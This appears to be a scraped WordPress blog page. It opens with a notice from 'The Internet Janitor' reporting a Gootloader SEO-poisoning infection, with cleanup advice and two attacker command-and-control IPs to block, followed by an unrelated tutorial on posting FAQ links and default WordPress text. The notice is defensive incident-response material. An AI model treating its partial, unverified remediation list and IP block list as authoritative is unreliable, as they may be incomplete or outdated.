Dear blog owner and visitors,
This blog had been infected to serve up Gootloader malware to Google search victims, via a common tactic known as SEO (Search Engine Optimization) poisioning. Your blog was serving up 374 malicious pages. Your blogged served up malware to 57 visitors.
I tried my best to clean up the infection, but I would do the following:
- Upgrade WordPress to the latest version (one way the attackers might have gained access to your server)
- Upgrade all WordPress themes to the latest versions (another way the attackers might have gained access to your server)
- Upgrade all WordPress plugins (another way the attackers might have gained access to your server), and remove any unnecessary plugins.
- Verify all users are valid (in case the attackers left a backup account, to get back in)
- Change all passwords (for WordPress accounts, FTP, SSH, database, etc.) and keys. This is probably how the attackers got in, as they are known to brute force weak passwords
- Run antivirus scans on your server
- Block these IPs (22.214.171.124 and 126.96.36.199), either in your firewall, .htaccess file, or in your /etc/hosts file, as these are the attackers command and control servers, which send malicious commands for your blog to execute
- Check cronjobs (both server and WordPress), aka scheduled tasks. This is a common method that an attacker will use to get back in. If you are not sure, what this is, Google it
- Consider wiping the server completly, as you do not know how deep the infection is. If you decide not to, I recommend installing some security plugins for WordPress, to try and scan for any remaining malicious files. Integrity Checker, WordPress Core Integrity Checker, Sucuri Security,
and Wordfence Security, all do some level of detection, but not 100% guaranteed
- Go through the process for Google to recrawl your site, to remove the malcious links (to see what malicious pages there were, Go to Google and search site:your_site.com agreement)
- Check subdomains, to see if they were infected as well
- Check file permissions
Gootloader (previously Gootkit) malware has been around since 2014, and is used to initally infect a system, and then sell that access off to other attackers, who then usually deploy additional malware, to include ransomware and banking trojans. By cleaning up your blog, it will make a dent in how they infect victims. PLEASE try to keep it up-to-date and secure, so this does not happen again.
The Internet Janitor
Below are some links to research/further explaination on Gootloader:
We’ll walk through the process from start to finish using the one I’m currently posting as the example.
- Find the question you’re going to post. I’m starting out just typing in the word “question” in the search on our Facebook page to get a list of all posts that include the word.
- Open the link for the conversation that you’re going to add. I keep my search results in one tab and open the individual discussions in another one so I don’t have to keep repeating the searches or clicking to get to the oldest ones I can find.
- On this website, find the bar across the top of your browser window. Click New, then FAQ.
- Make sure you keep both windows open, because the next couple of steps will be going back and forth between here and Facebook. In the window where the post you’re adding is showing, highlight the actual question that’s being asked. It’s ok to copy more than one sentence, we’ll fix that in a later step. Right-click on the highlighted portion and click Copy.
- Back on the Add FAQ page, you want to make sure your cursor is in the box under Add New Post that says “Enter Title Here”, right-click with your mouse and click Paste. That puts the question you copied in the last step as the title.
- In the large text box that looks like a word processor window or email window, you want to type “View the discussion here.” Yes, it’s generic, but we aren’t duplicating effort. We’re just making it easier to find the posts in the Facebook group.
- Now we need to link the discussion from our page to this post. Go back to the Facebook post again. You need to select the address for the post from the browser’s address bar and copy it.
- Back on your Add FAQ window, you want to highlight the word “here” and click on the chain link icon on the toolbar. That will open the Add Link window.
- Put your cursor in the URL box and right-click>Paste to put in the address you copied from Facebook. Make sure that the box next to “Open link in a new window/tab” is selected, then click Add Link.
- Next is the Category. If the category this question belongs in is displayed in the FAQ Categories box on the right side of the screen, select it and you’re done with this step. If not, you need to add a new category. Click where it says “+ Add New Category”.
- Since the post I’m linking to is about Inclusions, that’s what I decided to name the category. Type the name into the text box and click “Add New FAQ Category”.
- Your category will appear on the list and selected when it’s been added. By now you may have noticed that the permalink to this post that displays under the title might be a little bit too long. That’s because it takes the entire title to make it! We can fix that, though… and here’s how. Click the “Edit” button at the end of the Permalink.
- Shorten the link by removing some of the words. I decided to make this one “copper-wire-color”. Remember that the only restriction is that you can’t use the same words in this field that are used for another FAQ item. When you’ve finished editing the link, click “Ok”.
- Look everything over to make sure you didn’t forget any steps, then click the Publish button and you’re done!
Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!